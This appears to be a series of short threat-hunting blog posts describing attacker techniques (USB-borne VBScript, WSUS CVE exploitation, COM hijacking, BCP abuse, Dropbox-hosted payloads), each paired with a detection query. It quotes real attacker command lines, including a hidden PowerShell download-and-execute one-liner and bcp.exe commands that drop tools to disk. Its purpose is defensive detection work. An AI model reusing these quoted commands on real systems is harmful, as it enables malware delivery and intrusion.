Know Your Adversary

Hello everyone! It may be not very common, but some adversaries still use infected USB devices for malware distribution, so today we'll look at an example of  Replication Through Removable Media (T1091) . The example is Tangerine Turkey . The adversary leverages infected USB devices to distribute cryptocurrency-mining malware. So, the infection starts from executing a malicious VBScript from a USB drive: C:\WINDOWS\System32\WScript.exe E:\rootdir\x817994.vbs It means we can hunt for suspicious scripts executed from external drives, for example, D:\, E:\ and F:\.  Let's build the query: event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("d\\\:" OR "e\\\:" OR "f\\\:") See you tomorrow!

Hello everyone! I think you already heard about a vulnerability in Microsoft's Windows Server Update Services (WSUS). Today we'll talk about  Exploit Public-Facing Application (T1190) and  CVE-2025-59287 . So, the vulnerability is already actively exploited ITW. According to this report , successful exploitation leads to spawning command and scripting interpreters from  wsusservice.exe and  w3wp.exe . Here we have the first part of our detection opportunities.  The first one: event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "wsusservice.exe" The second: event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "w3wp.exe" AND proc_p_cmdline: "wsuspool" Also, the adversary leveraged a PowerShell payload to exfiltrate data to a webhook.site endpoint. And this is another detection opportun...

Hello everyone! Let's talk about data exfiltration trends and ransomware. Modern ransomware attacks almost always involve this stage, so it's important to document tools they use to solve this task. According to this report , Qilin ransomware affiliates often abuse Cyberduck for data exfiltration. It's a legitimate open source file transfer client that enables adversary to connect to remote servers and cloud storage services to upload, download, and manage files. As always, we can build hunts based on executable's metadata, for example: event_type: "processcreatewin" AND proc_file_productname: "cyberduck" Also, we can look for resolving Cyberduck-related domains, for example: event_type: "dnsreqwin" AND dns_rname: "cyberduck.io" See you tomorrow!

Hello everyone! We talked about how adversaries masquarade malicious files a few times already, but let's look at another qurious case of COM Hijacking (T1546.015). By adding a malicious entry under HKCU that points a CLSID to their DLL, attackers cause normal system processes to load that malicious DLL. In this case, overrode the CLSID for twinapi.dll ( {AA509086-5Ca9-4C25-8F95-589D3C07B48A} ), forcing system processes and web browsers to load the attacker’s DLL. We can hunt for loading  twinapi.dll from uncommon locations: event_type: "imageloadwin" AND file_name: "twinapi.dll" AND NOT file_path: ("windows\\system32" OR "windows\\syswow64") See you tomorrow!

Hello everyone! Today we'll look at a curious example of  Deobfuscate/Decode Files or Information (T1140) , and learn how ransomware affiliates abuse Bulk Copy Program (BCP). The example is Trigona ransomware gang, which also uses Mimic ransomware in their campaigns. So, the adversary often targets MS-SQL Server instances and leverages bcp.exe to export the toolset to the compromised server, for example: bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\spd.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt” bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\AD.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt” bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[username]\music\L.bat” -T -f “C:\users\[username]\music\FODsOZKgAU.txt” bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[username]\music\pci2.exe” -T -f “C:\users\[users name]\music\FODsOZKgAU.txt” For example, we can hunt for bcp.exe exporting files to suspicious folders: event_ty...

Hello everyone! Let's look at another example of how financially motivated adversaries leverage legitimate web services to deliver malware. A financially-motivated threat cluster (tracked as UNC6229 ) based in Vietnam is using fake job postings to target workers in digital advertising and marketing.  The attackers post convincing job listings on legitimate job platforms and sometimes on domains they set up themselves. The adversary leveraged malcious LNK files, which abused PowerShell to download a payload from Dropbox: PowerShell -WindowStyle Hidden -Command "Iex (irm 'hxxps://xkc1ffaq1b.dl.dropboxusercontent[.]com/scl/fi/e/0?rlkey=5lf9n8l2v6xmqpmnmqltf3s38')" For example, we can hunt for PowerShell having Dropbox-related domains among command line arguments: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: *dropboxusercontent* See you tomorrow!